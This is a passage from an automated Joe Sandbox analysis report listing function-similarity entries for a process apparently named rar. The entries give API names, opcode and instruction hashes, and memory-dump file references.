                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 63ae987077db39b18cf30f3f9a6d60a5092a8d8f4155411af1d7abcba61ca722
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8314236618BC18ADB60DF25E8402EDB3A4FB89764F900136EA9D43B59DF3CD155CB20
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3398352648-0
                                                                                                                                                                                                                              • Opcode ID: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction ID: 4adc6c086d054ba8f20651c47acb397e9575fc8f64a3d80ab84800cafd9dd8dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a68743f79c0fdba85814f3f902c484d9b924ee88fd84a1759920b380f60e4056
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0C114531A187818AEB509F61F8405AAF7E4FB88B90F944536EA8E43658DF3CE115DB70
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrow$ErrorLaststd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3116915952-0
                                                                                                                                                                                                                              • Opcode ID: 71f1bbfe8e745b8f4eb9635b878db5a0e4a1844d939d302f67a965224fd40fd9
                                                                                                                                                                                                                              • Instruction ID: ffdd23406dd52354bb98c045406eef855bc28592ff8249d878d9e1cd4d9a6ff4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71f1bbfe8e745b8f4eb9635b878db5a0e4a1844d939d302f67a965224fd40fd9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24E16022A08AC685EA20FF25E8505FDA3E1FB857A4F844032DA4D4779ADE3CE525D730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00007FF7CF8A11B0,?,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A3AC4
                                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,?,?,00007FF7CF8A11B0,?,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A3B0A
                                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00007FF7CF8A3B55
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00007FF7CF8A11B0,?,?,?,00000000,?,?,00007FF7CF89F30F,00000000,00007FF7CF886380,?,00007FF7CF882EC8), ref: 00007FF7CF8A3B60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CreateFile$CloseControlDeviceHandle
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 998109204-0
                                                                                                                                                                                                                              • Opcode ID: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                              • Instruction ID: 0ad599c086cc3ce9ad33cad8f40918fac15dab964ee13b7b910e5f4a82a3e3d2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eff6c290fb367c5b76febf0d76c2ae076eb862a10f6af346eafb357c39462c7d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CC31A132618BC186EB609F51B4406DAB7A4FB887F0F500235EEA903BD8CF3CD5659B10
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: CMT
                                                                                                                                                                                                                              • API String ID: 0-2756464174
                                                                                                                                                                                                                              • Opcode ID: 13be29d8e39cae67aab45b2dc07b05ea796754ef1fa03a0aad6a885bf0702d2f
                                                                                                                                                                                                                              • Instruction ID: 304548f4ae8c27fc0dc0f934cd2504426cb859e7ce5479128102651b13ca1d80
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13be29d8e39cae67aab45b2dc07b05ea796754ef1fa03a0aad6a885bf0702d2f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A2D1BE62A19AD285EA20FF21D8501FDA3E1FF85BA0FC44532DA9E47695DF2CE511E330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7CF8E8704
                                                                                                                                                                                                                                • Part of subcall function 00007FF7CF8E4E3C: GetCurrentProcess.KERNEL32(00007FF7CF8E9CC5), ref: 00007FF7CF8E4E69
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: *?$.
                                                                                                                                                                                                                              • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                              • Opcode ID: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                              • Instruction ID: 37425b70fa0180ede14e216e9a0f0d9fb9330d588a0728db647eba0af9a81d36
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 354f185c14a0bc8d05e3972864cc7dbacf8a132eb4984f49e6355014e857c6aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA51DF6AB14AD685EB10EFA298002FCA7E4BB48BE8BD44531DE5D17B85DF3CD0619320
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3429775523-0
                                                                                                                                                                                                                              • Opcode ID: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                              • Instruction ID: ce034d28baf75e07cfdbc3ec73dbd3ac7a433fb0d244d5d07b54119dbd4f6d27
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: db3c1d02e190598f29aa164aeddc5f855d0a4ca8ba77325bab1d25996cb1689a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7114972B146418EEB109FB5E4812EEB7B0FB48758F90153ADA8D93A58CF3CC154CB24
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFormatLastMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3479602957-0
                                                                                                                                                                                                                              • Opcode ID: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                              • Instruction ID: 1c0b108cd804b23e312c4e7be82c055210b91c5e86184e2afed346bbb82ce300
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5edc9aacada912d44111c0c5b3025bcfc37222d54029d4996b892e874874bebb
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B7F08931B0C79287E3109F56B44015AF7D4FB95BD4F548134EA8953B58CF7CD5619710
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DiskFreeSpace
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1705453755-0
                                                                                                                                                                                                                              • Opcode ID: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                              • Instruction ID: 7e47676b00ff0fd62a868612636cf23bd8da72d046dcd24f6b520c27c65ec6e3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336a33042f1e52100b28f5a1ad6ae687e8956255ef3791e684bc327077314d0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC012D32A286C186EB70EF55E4413EAB3A0FB84754F900132F78C82549DE2DD654DB60
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                                                                                                                                                                              • API String ID: 3215553584-2617248754
                                                                                                                                                                                                                              • Opcode ID: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                              • Instruction ID: f32c083fadc5ef709524b41d62926cccd843c2f17b421154c824a13239c80a74
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 336881e81ddd14afa9560f251b33c86b073c2b2d41bd1fd01ec7cedf827ef5ce
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C441CC36B09B8589EB00DF64E8417E977E4EB183A8F80413AEE5C03B59DE3CD425C364
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Console$Mode$Handle$Readfflush
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1039280553-0
                                                                                                                                                                                                                              • Opcode ID: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction ID: 18f44756b85cd652584daf436e690086929068da93b6155d61df9a849a9c4fee
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c62bb105008418d5d8f1a35d4748ced2dc44b1bf30dc7e2d2292546f420945d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24219835B186828BEB00AF25E8041BDA3A1FB99BB0F940130EE4A07764DE3CE556D730
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000068.00000002.1752058865.00007FF7CF881000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF7CF880000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752003164.00007FF7CF880000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752130950.00007FF7CF8F0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752242501.00007FF7CF908000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752297352.00007FF7CF909000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF90A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF914000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF91E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752380857.00007FF7CF926000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752625538.00007FF7CF928000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000068.00000002.1752666355.00007FF7CF92E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_104_2_7ff7cf880000_rar.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 932687459-0
                                                                                                                                                                                                                              • Opcode ID: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                              • Instruction ID: d7ea9aa52405444cabc7ab9e35f93fea0bd2e8fd8c463d694a3d58e47908c654
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 17b6f32cd8d6fcc81585299b8a9163aaa78fd032cef7b8e26f7336cc4ddc1b9c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9681A062A0DAC385EB15AE11E4403FDA2D1EF44BA4F984132DA4D47B99DF7CE4629330
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
